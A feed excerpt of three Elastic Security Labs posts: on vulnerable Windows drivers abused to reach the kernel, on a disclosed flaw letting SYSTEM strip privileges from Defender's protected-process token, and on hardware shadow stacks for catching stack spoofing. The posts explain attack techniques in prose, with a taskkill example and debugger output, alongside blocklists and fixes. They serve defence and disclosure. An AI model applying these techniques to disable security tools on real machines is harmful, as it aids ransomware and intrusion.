<li>Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products.</li>
<li>Elastic Security <a href="https://github.com/elastic/protections-artifacts/search?q=VulnDriver">released</a> 65 YARA rules to detect vulnerable driver abuse.</li>
<li>Elastic Endpoint (8.3+) protects users from this threat.</li>
</ul>
<h2>Background</h2>
<p>In 2018, <a href="https://twitter.com/GabrielLandau">Gabriel Landau</a> and <a href="https://twitter.com/dez_">Joe Desimone</a> presented a <a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf">talk</a> at Black Hat covering the evolution of kernel mode threats on Windows. The most concerning trend was towards leveraging known good but vulnerable drivers to gain kernel mode execution. We showed this was practical, even with hypervisor mode integrity protection (<a href="https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-hvci-enablement">HVCI</a>) and Windows Hardware Quality Labs (<a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature">WHQL</a>) signing requirement enabled. At the time, the risk to everyday users was relatively low, as these techniques were mostly leveraged by advanced state actors and top red teams.</p>
<p>Fast forward to 2022, and attacks leveraging vulnerable drivers are a growing concern due to a <a href="https://github.com/hfiref0x/KDU">proliferation</a> of open source <a href="https://github.com/br-sn/CheekyBlinder">tools</a> to perform these <a href="https://github.com/Cr4sh/KernelForge">attacks</a>. Vulnerable drivers have now been <a href="https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/">used by ransomware</a> to terminate security software before encrypting the system. Organizations can reduce their risk by limiting administrative user permissions. However, it is also imperative for security vendors to protect the user-to-kernel boundary because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. Kernel access gives attackers free rein to tamper or terminate endpoint security products or inject code into protected processes.</p>
<p>This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.</p>
<h2>Attack flow</h2>
<p>There are a number of flaws in drivers that can allow attackers to gain kernel mode access to fully compromise the system and remain undetected. Some of the <a href="https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/">most common</a> flaws include granting user mode processes write access to virtual memory, physical memory, or <a href="https://en.wikipedia.org/wiki/Model-specific_register">model-specific registers</a> (MSR). Classic buffer overflows and missing bounds checks are also common.</p>
<p>A less common driver flaw is unrestricted <a href="https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458">handle duplication</a>. While this may seem like innocuous functionality at first glance, handle duplication can be leveraged to gain full kernel code execution by user mode processes. For example, the latest <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer">Process Explorer</a> driver by Microsoft exposes <a href="https://github.com/Yaxser/Backstab">such a function</a>.</p>
<p>An attacker can leverage this vulnerability to duplicate a <a href="https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458">sensitive handle</a> to raw physical memory present in the System (PID 4) process.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image1.jpg" alt="Handle to Physical Memory in the System process" /></p>
<p>After obtaining <a href="http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf">the cr3 value</a>, the attacker can walk the page tables to convert virtual kernel addresses to their associated physical addresses. This grants an arbitrary virtual read/write primitive, which attackers can leverage to easily tamper with kernel data structures or execute arbitrary kernel code. On HVCI-enabled systems, thread control flow can be hijacked to execute arbitrary kernel functions as shown below.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image3.jpg" alt="Hijacking Threat Flow Control" /></p>
<p>We reported this issue to Microsoft in the vulnerable driver <a href="https://www.microsoft.com/en-us/wdsi/driversubmission">submission portal</a> on July 26, but as of this writing have not received a response. We hope Microsoft will consider this a serious security issue worth addressing. Ideally, they will release a fixed version without the vulnerable <a href="https://docs.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-">IOCTLs</a> and include it in the default HVCI blocklist. This would be consistent with the <a href="https://github.com/MicrosoftDocs/windows-itpro-docs/blob/ce56a2f15015e07bf35cd05ce3299340d16e759a/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md?plain=1#L391">blocking</a> of the ProcessHacker (now known as <a href="https://github.com/winsiderss/systeminformer">System Informer</a>) driver for the <a href="https://www.unknowncheats.me/forum/downloads.php?do=file&amp;id=25441">same flaw.</a></p>
<h2>Blocklisting</h2>
<p>Blocklisting prevents known vulnerable drivers from loading on a system, and is a great first step to the vulnerable driver problem. Blocklisting can raise the cost of kernel attacks to levels out of reach for some criminal groups, while maintaining low false positive rates. The downside is it does not stop more <a href="https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/">advanced groups</a>, which can identify new, previously-unknown, vulnerable drivers.</p>
<p>Microsoft maintains a <a href="https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md">catalog</a> of known exploited or malicious drivers, which should be a minimum baseline. This catalog consists of rules using various combinations of <a href="https://reversea.me/index.php/authenticode-i-understanding-windows-authenticode/">Authenticode</a> hash, certificate hash (also known as <a href="https://www.rfc-editor.org/rfc/rfc5280#section-4.1">TBS</a>), internal file name, and version. The catalog is intended to be used by Windows Defender Application Control (<a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview">WDAC</a>). We used this catalog as a starting point for a more comprehensive list using the <a href="https://virustotal.github.io/yara/">YARA</a> community standard.</p>
<p>To expand on the existing list of known vulnerable drivers, we pivoted through VirusTotal data with known vulnerable import hashes and other metadata. We also combed through public attack tooling to identify additional vulnerable drivers. As common practice for Elastic Security, we made our <a href="https://github.com/elastic/protections-artifacts/search?q=VulnDriver">blocklist</a> available to the community. In Elastic <a href="https://www.elastic.co/kr/security/endpoint-security">Endpoint Security</a> version 8.3 and newer, all drivers are validated against the blocklist in-line before they are allowed to load onto the system (shown below).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image6.jpg" alt="enter image description here" /></p>
<h2>Allowlisting</h2>
<p>One of the most robust defenses against this driver threat is to only allow the combination of driver signer, internal file name, version, and/or hashes, which are known to be in use. We recommend organizations be as strict as feasible. For example, do not blanket trust all <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-test-signature-program">WHQL</a> signed drivers. This is the classic application control method, albeit focusing on drivers. An organization’s diversity of drivers should be more manageable than the entirety of user mode applications. Windows Defender Application Control (<a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview">WDAC</a>) is a powerful built-in feature that can be configured this way. However, the learning curve and maintenance costs may still be too high for organizations without well-staffed security teams. To reap most of the benefits of the allowlisting approach, but reduce the cost of implementation to the users (ideally to blocklisting levels), we recommend two approaches in tandem: behavior control and alert on first seen.</p>
<h2>Behavior control</h2>
<p>The concept behind behavior control is to produce a more manageable set of allowlistable behavior choke points that can be tuned for high confidence. For example, we can create a behavior control around which applications are allowed to write drivers to disk. This may start with a relatively loose and simple rule:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image2.jpg" alt="Example EQL Query" /></p>
<p>From there, we can allowlist the benign applications that are known to exhibit this behavior. Then we receive and triage hits, tune the rule until it becomes high confidence, and then ship as part of our <a href="https://www.elastic.co/kr/blog/whats-new-elastic-security-7-15-0">malicious behavior protection</a>. Elastic SIEM users can use the same technique to <a href="https://www.elastic.co/kr/guide/en/security/current/rules-ui-create.html">create custom</a> Detection Engine <a href="https://github.com/elastic/detection-rules">rules</a> tuned specifically for their environment.</p>
<h2>First seen</h2>
<p>Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the <a href="https://www.elastic.co/kr/guide/en/security/8.4/rules-ui-create.html#create-new-terms-rule">“New Terms” rule type</a>, which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image5.jpg" alt="First Seen" /></p>
<p>This empowers security teams to quickly surface unusual drivers the first time they’re seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image4.jpg" alt="Visualizing It" /></p>
<h2>Conclusion</h2>
<p>Vulnerable driver exploitation, once relegated to advanced adversaries, has now proliferated to the point of being used in ransomware attacks. The time for the security community to come together and act on this problem is now. We can start raising the cost by collaborating on blocklists as a community. We should also investigate additional detection strategies such as behavior control and anomaly detection to raise the cost further without requiring significant security expertise or resources to achieve.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/blog-thumb-clock-gears.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Sandboxing Antimalware Products for Fun and Profit]]></title>
            <link>https://www.elastic.co/kr/security-labs/sandboxing-antimalware-products</link>
            <guid>sandboxing-antimalware-products</guid>
            <pubDate>Tue, 21 Feb 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack.]]></description>
            <content:encoded><![CDATA[<p>This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack. This is of particular interest because we build and maintain two anti-malware products that benefit from this protection.</p>
<h2>Protected Anti-Malware Services</h2>
<p>Windows 8.1 <a href="https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">introduced</a> a concept of Protected Antimalware Services. This enables specially-signed programs to run such that they are immune from tampering and termination, even by administrative users. Microsoft’s documentation (<a href="https://web.archive.org/web/20211019010629/https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">archived</a>) describes this as:</p>
<blockquote>
<p>In Windows 8.1, a new concept of protected service has been introduced to allow anti-malware user-mode services to be launched as a protected service. After the service is launched as protected, Windows uses code integrity to only allow trusted code to load into the protected service. Windows also protects these processes from code injection and other attacks from admin processes.</p>
</blockquote>
<p>The goal is to prevent malware from instantly disabling your antivirus and then running amok. For the rest of this article, we call them Protected Process Light (PPL). For more depth, <a href="https://twitter.com/aionescu">Alex Ionescu</a> goes into great detail on protected processes in his <a href="https://www.youtube.com/watch?v=35L_qJNMu1A">talk at NoSuchCon 2014</a>.</p>
<p>To be able to run as a PPL, an anti-malware vendor must apply to Microsoft, prove their identity, sign binding legal documents, implement an <a href="https://docs.microsoft.com/en-us/windows/win32/w8cookbook/secured-boot">Early Launch Anti-Malware</a> (ELAM) driver, run it through a test suite, and submit it to Microsoft for a special Authenticode signature. It is not a trivial process. Once this process is complete, the vendor can <a href="https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-installelamcertificateinfo">use this ELAM driver</a> to have Windows protect their anti-malware service by running it as a PPL.</p>
<p>You can see PPL in action yourself by running the following from an elevated administrative command prompt on a default Windows 10 install:</p>
<p><strong>Protected Process Light in Action</strong></p>
<pre><code>C:\WINDOWS\system32&gt;whoami
nt authority\system

C:\WINDOWS\system32&gt;whoami /priv | findstr &quot;Debug&quot;
SeDebugPrivilege                Debug programs                    Enabled

C:\WINDOWS\system32&gt;taskkill /f /im MsMpEng.exe
ERROR: The process &quot;MsMpEng.exe&quot; with PID 2236 could not be terminated.
Reason: Access is denied.

</code></pre>
<p>As you can see here, even a user running as SYSTEM (or an elevated administrator) with <a href="https://devblogs.microsoft.com/oldnewthing/20080314-00/?p=23113">SeDebugPrivilege</a> cannot terminate the PPL Windows Defender anti-malware Service (MsMpEng.exe). This is because non-PPL processes like taskkill.exe cannot obtain handles with the PROCESS_TERMINATE access right to PPL processes using APIs such as <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a>.</p>
<p>In summary, Windows attempts to protect PPL processes from non-PPL processes, even those with administrative rights. This is both documented and implemented. That being said, with PROCESS_TERMINATE blocked, let’s see if there are other ways we can interfere with it instead.</p>
<h2>Windows Tokens</h2>
<p>A Windows token can be thought of as a security credential. It says who you are and what you’re allowed to do. Typically when a user runs a process, that process runs with their token and can do anything the user can do. Some of the most important data within a token include:</p>
<ul>
<li>User identity</li>
<li>Group membership (e.g. Administrators)</li>
<li>Privileges (e.g. SeDebugPrivilege)</li>
<li>Integrity level</li>
</ul>
<p>Tokens are a critical part of Windows authorization. Any time a Windows thread accesses a <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/securable-objects">securable object</a>, the OS performs a security check. It compares the thread’s effective token against the <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptors">security descriptor</a> of the object being accessed. You can read more about tokens in the Microsoft <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens">access token documentation</a> and the Elastic blog post that <a href="https://www.elastic.co/kr/blog/introduction-to-windows-tokens-for-security-practitioners">introduces Windows tokens</a>.</p>
<h3>Sandboxing Tokens</h3>
<p>Some applications, such as web browsers, have been repeated targets of exploitation. Once an attacker successfully exploits a browser process, the exploit payload can perform any action that the browser process can perform. This is because it shares the browser’s token.</p>
<p>To mitigate the damage from such attacks, web browsers have moved much of their code into lower-privilege worker processes. This is typically done by creating a restricted security context called a sandbox. When a sandboxed worker needs to perform a privileged action on the system, such as saving a downloaded file, it can ask a non-sandboxed “broker” process to perform the action on its behalf. If the sandboxed process is exploited, the goal is to limit the payload’s ability to cause harm to only resources accessible by the sandbox.</p>
<p>While modern sandboxing involves several components of OS security, one of the most important is a low-privilege, or restricted, token. New sandbox tokens can be created with APIs such as</p>
<p><a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-createrestrictedtoken">CreateRestrictedToken</a>
. Sometimes a sandboxed process needs to lock itself down after performing some initialization. The
<a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges">AdjustTokenPrivileges</a>
and
<a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups">AdjustTokenGroups</a>
APIs allow this adjustment. These APIs enable privileges and groups to be “forfeit” from an existing process’s token in such a way that they cannot be restored without creating a new token outside the sandbox.</p>
<p>One <a href="https://chromium.googlesource.com/chromium/src/+/master/docs/design/sandbox.md">commonly used sandbox</a> today is part of Google Chrome. Even some <a href="https://www.microsoft.com/security/blog/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/">security products</a> are getting into sandboxing these days.</p>
<h3>Accessing Tokens</h3>
<p>Windows provides the <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken">OpenProcessToken</a>API to enable interaction with process tokens. MSDN states that one must have the PROCESS_QUERY_INFORMATION right to use OpenProcessToken. Since a non-protected process can only get PROCESS_QUERY_LIMITED_INFORMATION access to a PPL process (note the LIMITED), it is seemingly impossible to get a handle to a PPL process’s token. However, MSDN is incorrect in this case. With only PROCESS_QUERY_LIMITED_INFORMATION, we can successfully open the token of a protected process. <a href="https://twitter.com/tiraniddo">James Forshaw</a>explains this documentation discrepancy in more depth, showing the underlying</p>
<p><a href="https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html">de-compiled kernel code</a>.</p>
<p>Tokens are themselves securable objects. As such, regular access checks still apply. The effective token of the thread attempting to access the token is checked against the security descriptor of the token being accessed for the requested access rights (TOKEN_QUERY, TOKEN_WRITE, TOKEN_IMPERSONATE, etc). For more detail about access checks, see the Microsoft article, “<a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/how-dacls-control-access-to-an-object">How Access Checks Work</a>.”</p>
<h2>The Attack</h2>
<p><a href="https://github.com/processhacker/processhacker/releases/tag/v2.39">Process Hacker</a> provides a nice visualization of token security descriptors. Taking a look at Windows Defender’s (MsMpEng.exe) token, we see the following Discretionary Access Control List (DACL):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/sandboxing-antimalware-products/advanced-security-settings.jpg" alt="" /></p>
<p>Note that the SYSTEM user has full control over the token. This means, unless some other mechanism is protecting the token, a thread <a href="https://powersploit.readthedocs.io/en/latest/Privesc/Get-System/">running as SYSTEM</a> can modify the token. When such modification is possible, it violates the desired “PPL is protected from administrators” design goal.</p>
<h3>Demo</h3>
<p>Alas, there is no other mechanism protecting the token. Using this technique, an attacker can forcefully remove all privileges from the MsMpEng.exe token and reduce it from <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control">system to untrusted integrity</a>. Being nerfed to untrusted integrity prevents the victim process from accessing most securable resources on the system, quietly incapacitating the process without terminating it.</p>
&lt;Video vidyard_uuid=&quot;wSgaLpcXyZLupdiwg6BNyj&quot; /&gt;
<p>In this video, the attacker could have further restricted the token, but the privilege and integrity changes were sufficient to prevent MsMpEng.exe from detecting and blocking a Mimikatz execution. We felt this illustrated a valid proof of concept.</p>
<h2>Defense</h2>
<p>Newer versions of Windows include an undocumented feature called “trust labels.” Trust labels are part of the <a href="https://docs.microsoft.com/en-us/windows/win32/ad/retrieving-an-objectampaposs-sacl">System Access Control List</a> (SACL), an optional component of every security descriptor. Trust labels allow Windows to restrict specific access rights to certain types of protected processes. For example, Windows <a href="https://www.elastic.co/kr/blog/protecting-windows-protected-processes">protects</a> the \KnownDlls object directory from <a href="https://www.elastic.co/kr/blog/detect-block-unknown-knowndlls-windows-acl-hardening-attacks-cache-poisoning-escalation">modification by malicious administrators</a> using a trust label. We can see this with <a href="https://github.com/hfiref0x/WinObjEx64">WinObjEx64</a>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/sandboxing-antimalware-products/KnownDlls-Trust-Label.jpg" alt="" /></p>
<p>Like \KnownDlls, tokens are securable objects, and thus it is possible to protect them against modification by malicious administrators. Elastic Security does this, in fact, and is immune to this attack, by denying TOKEN_WRITE access to processes with a trust label below “Anti-Malware Light.” Because this protection is applied at runtime, however, there is still a brief window of vulnerability until it can apply the trust label.</p>
<p>Ideally, Windows would apply such a trust label to each PPL process’s token as it is created. This would eliminate the race condition and fix the vulnerability in the PPL mechanism. There is precedent. With a kernel debugger, we can see that Windows is already protecting the System process’ token on Windows (21H1 shown below) with a trust label:</p>
<pre><code>1: kd&gt; dx -r1 (((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]-&gt;KernelObject-&gt;Token-&gt;Object - sizeof(nt!_OBJECT_HEADER))  &amp; ~0xf))-&gt;SecurityDescriptor &amp; ~0xf)
(((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]-&gt;KernelObject-&gt;Token-&gt;Object - sizeof(nt!_OBJECT_HEADER))  &amp; ~0xf))-&gt;SecurityDescriptor &amp; ~0xf) : 0xffffe00649c46c20
1: kd&gt; !sd 0xffffe00649c46c20
-&gt;Revision: 0x1
-&gt;Sbz1    : 0x0
-&gt;Control : 0x8814
            SE_DACL_PRESENT
            SE_SACL_PRESENT
            SE_SACL_AUTO_INHERITED
            SE_SELF_RELATIVE
-&gt;Owner   : S-1-5-32-544
-&gt;Group   : S-1-5-32-544
-&gt;Dacl    :
-&gt;Dacl    : -&gt;AclRevision: 0x2
-&gt;Dacl    : -&gt;Sbz1       : 0x0
-&gt;Dacl    : -&gt;AclSize    : 0x1c
-&gt;Dacl    : -&gt;AceCount   : 0x1
-&gt;Dacl    : -&gt;Sbz2       : 0x0
-&gt;Dacl    : -&gt;Ace[0]: -&gt;AceType: ACCESS_ALLOWED_ACE_TYPE
-&gt;Dacl    : -&gt;Ace[0]: -&gt;AceFlags: 0x0
-&gt;Dacl    : -&gt;Ace[0]: -&gt;AceSize: 0x14
-&gt;Dacl    : -&gt;Ace[0]: -&gt;Mask : 0x000f01ff
-&gt;Dacl    : -&gt;Ace[0]: -&gt;SID: S-1-5-18

-&gt;Sacl    :
-&gt;Sacl    : -&gt;AclRevision: 0x2
-&gt;Sacl    : -&gt;Sbz1       : 0x0
-&gt;Sacl    : -&gt;AclSize    : 0x34
-&gt;Sacl    : -&gt;AceCount   : 0x2
-&gt;Sacl    : -&gt;Sbz2       : 0x0
-&gt;Sacl    : -&gt;Ace[0]: -&gt;AceType: SYSTEM_MANDATORY_LABEL_ACE_TYPE
-&gt;Sacl    : -&gt;Ace[0]: -&gt;AceFlags: 0x0
-&gt;Sacl    : -&gt;Ace[0]: -&gt;AceSize: 0x14
-&gt;Sacl    : -&gt;Ace[0]: -&gt;Mask : 0x00000001
-&gt;Sacl    : -&gt;Ace[0]: -&gt;SID: S-1-16-16384

-&gt;Sacl    : -&gt;Ace[1]: -&gt;AceType: SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE
-&gt;Sacl    : -&gt;Ace[1]: -&gt;AceFlags: 0x0
-&gt;Sacl    : -&gt;Ace[1]: -&gt;AceSize: 0x18
-&gt;Sacl    : -&gt;Ace[1]: -&gt;Mask : 0x00020018
-&gt;Sacl    : -&gt;Ace[1]: -&gt;SID: S-1-19-1024-8192

</code></pre>
<p>The SYSTEM_PROCESS_TRUST_LABEL_ACE_TYPE access control entry limits access to READ_CONTROL, TOKEN_QUERY, and TOKEN_QUERY_SOURCE (0x00020018) unless the caller is a WinTcb protected process (SID S-1-19-1024-8192). That SID can be interpreted as follows:</p>
<ul>
<li>1: <a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L1794">Revision 1</a></li>
<li>19: <a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2097">SECURITY_PROCESS_TRUST_AUTHORITY</a></li>
<li>1024:
<a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2100">SECURITY_PROCESS_PROTECTION_TYPE_FULL_RID</a></li>
<li>8192:
<a href="https://github.com/gabriellandau/ctypes-windows-sdk/blob/0a5bfaa9385391038a7d31928b14d6fe5b76fa97/cwinsdk/um/winnt.py#L2104">SECURITY_PROCESS_PROTECTION_LEVEL_WINTCB_RID</a></li>
</ul>
<h3>Mitigation</h3>
<p>Alongside this article, we are releasing an update to the <a href="https://github.com/elastic/PPLGuard">PPLGuard</a> proof-of-concept that protects all running anti-malware PPL processes against this attack. It includes example code that anti-malware products can employ to protect themselves. Here it is in action, protecting Defender:</p>
&lt;Video vidyard_uuid=&quot;zuKPeTwxbRaGAPL8BsrMKA&quot; /&gt;
<h2>Disclosure</h2>
<p>We disclosed this vulnerability and proposed fixes to the <a href="https://www.microsoft.com/en-us/msrc?rtc=1">Microsoft Security Response Center</a> (MSRC) on 2022-01-05. They responded on 2022-01-24 that they have classified it as moderate severity, and will not address it with a security update. However, they may address it in a future version of Windows.</p>
<h2>Conclusion</h2>
<p>In this article, we disclosed a flaw in the Windows Protected Process Light (PPL) mechanism. We then demonstrated how malware can use this flaw to neutralize PPL anti-malware products. Finally, we showed a simple ACL fix (with sample code) that anti-malware products can employ to defend against this attack. Elastic Security already incorporates this fix, but we hope that Windows implements it (or something equivalent) by default in the near future.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/sandboxing-antimalware-products/blog-thumb-tools-various.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Finding Truth in the Shadows]]></title>
            <link>https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows</link>
            <guid>finding-truth-in-the-shadows</guid>
            <pubDate>Thu, 26 Jan 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[Let's discuss three benefits that Hardware Stack Protections brings beyond the intended exploit mitigation capability, and explain some limitations.]]></description>
            <content:encoded><![CDATA[<p>Microsoft has begun rolling out user-mode <a href="https://techcommunity.microsoft.com/t5/windows-kernel-internals-blog/understanding-hardware-enforced-stack-protection/ba-p/1247815">Hardware Stack Protection</a> (HSP) starting in Windows 10 20H1. HSP is an exploit mitigation technology that prevents corruption of return addresses on the stack, a common component of <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">code reuse attacks</a> for software exploitation. Backed by silicon, HSP uses Intel's Control flow Enforcement Technology (CET) and AMD's Shadow Stack, combined with software support <a href="https://windows-internals.com/cet-on-windows/">described in great detail</a> by Yarden Shafir and Alex Ionescu. Note that the terms HSP and CET are often used interchangeably.</p>
<p>HSP creates a shadow stack, separate from the regular stack. It is read-only in user mode, and consists exclusively of return addresses. Contrast this with the regular stack, which interleaves data with return addresses, and must be writable for applications to function correctly. Whenever a CALL instruction executes, the current instruction pointer (aka return address) is pushed onto both the regular and shadow stacks. Conversely, RET instructions pop the return address from both stacks, generating an exception if they mismatch. In theory, ROP attacks are mitigated because attackers can't write arbitrary values to the read-only shadow stack, and changing the Shadow Stack Pointer (SSP) is a privileged operation, making pivots impossible.</p>
<p>Today we’re going to discuss three additional benefits that HSP brings, beyond the intended exploit mitigation capability, then go into some limitations.</p>
<h1>Debugging</h1>
<p>Although designed as an exploit mitigation, HSP provides useful data for other purposes. Modern versions of <a href="https://apps.microsoft.com/store/detail/windbg-preview/9PGJGD53TN86?hl=en-us&amp;gl=us">WinDbg</a> will display a hint to the user that they can use SSP as an alternate way to recover a stack trace. This can be very useful when debugging stack corruption bugs that overwrite return addresses, because the shadow stack is independent. It's also useful in situations where the stack unwind data is unavailable.</p>
<p>For example, see the WinDbg output below for a process memory dump. The <code>k</code> command displays a regular stack trace. <code>dps @ssp</code> resolves all symbols it can find, starting at SSP - this is essentially a shadow stack trace. Note how the two stack traces are identical except for the first frame:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image3.png" alt="Note the similarities" /></p>
<h1>Performance</h1>
<p>Kernel mode components such as EDR and ETW often capture stack traces to provide additional context to each event. On x64 platforms, a stack walk entails capturing the thread’s context, then looking up a data structure for each frame that enables the walker to &quot;unwind&quot; it and find the next frame. These lookups were slow enough that Microsoft saw fit to construct a <a href="http://uninformed.org/index.cgi?v=8&amp;a=2&amp;p=20">multi-tier cache system</a> when they added x64 support. You can see the traverse/unwind process approximated <a href="https://github.com/reactos/reactos/blob/11a71418d50f48ff0e10d2dbbe243afaf34c4368/sdk/lib/rtl/amd64/unwind.c#L909C6-L1011">here</a> in ReactOS, sans cache.</p>
<p>Given that the entire shadow stack likely resides on a single page and no unwinding is required, shadow stack walking is probably more performant than traditional stack walking, though this has yet to be proven.</p>
<h1>Detection</h1>
<p>The shadow stack provides an interesting detection opportunity. Adversaries can use techniques demonstrated in <a href="https://github.com/mgeeky/ThreadStackSpoofer/tree/master">ThreadStackSpoofer</a> and <a href="https://github.com/WithSecureLabs/CallStackSpoofer">CallStackSpoofer</a> to obfuscate their presence against thread stack scans (e.g. <code>StackWalk64</code>) and inline stack traces like <a href="https://www.lares.com/blog/hunting-in-the-sysmon-call-trace/">Sysmon Open Process events</a>.</p>
<p>By comparing a traditional stack walk against its shadowy sibling, we can both detect and bypass thread stack spoofing. We present <a href="https://github.com/gabriellandau/ShadowStackWalk">ShadowStackWalk</a>, a PoC that implements CaptureStackBackTrace/StackWalk64 using the shadow stack to catch thread stack spoofing.</p>
<p>When the stack is normal, ShadowStackWalk functions similarly to <code>CaptureStackBackTrace</code> and <code>StackWalk64</code>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image7.jpg" alt="ShadowStackWalk normal stack" /></p>
<p>ShadowStackWalk is unaffected by intentional breaks of the call stack such as <a href="https://github.com/mgeeky/ThreadStackSpoofer/blob/f67caea38a7acdb526eae3aac7c451a08edef6a9/ThreadStackSpoofer/main.cpp#L20-L25">ThreadStackSpoofer</a>. Frames missed by other techniques are in green:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image8.jpg" alt="ShadowStackWalk encounters a broken call stack" /></p>
<p>ShadowStackWalk doesn't care about forged stack frames. Incorrect frames are in red. Frames missed by other techniques are in green:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image9.jpg" alt="Forged stack frames? No Problem." /></p>
<h1>Limitations</h1>
<p>Hardware support for HSP is limited. HSP requires at least an 11th-gen Intel or 5000-series Ryzen CPU, both released in late 2020. There is no software emulation. It will take years for the majority of CPUs to support HSP.</p>
<p>Software support for HSP is limited. Microsoft has been slowly rolling it out, even among their own processes. On an example Windows 10 22H2 workstation, it's enabled in roughly 40% of processes. Because HSP is an exploit mitigation, implementation will likely start with common exploitation targets like web browsers, though not all msedge.exe processes shown below are not protected by it. As HSP matures and support improves, non-HSP processes will become outliers worthy of additional scrutiny, similar to processes in 2023 without DEP support. For now, malware can simply choose processes without HSP enabled. Also of note is that HSP does not support WOW64 at all.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/finding-truth-in-the-shadows/image2.jpg" alt="Software support for HSP is limited, even among Microsoft's processes (in red). Contrasted (in blue) against mature technologies like DEP and ASLR" /></p>
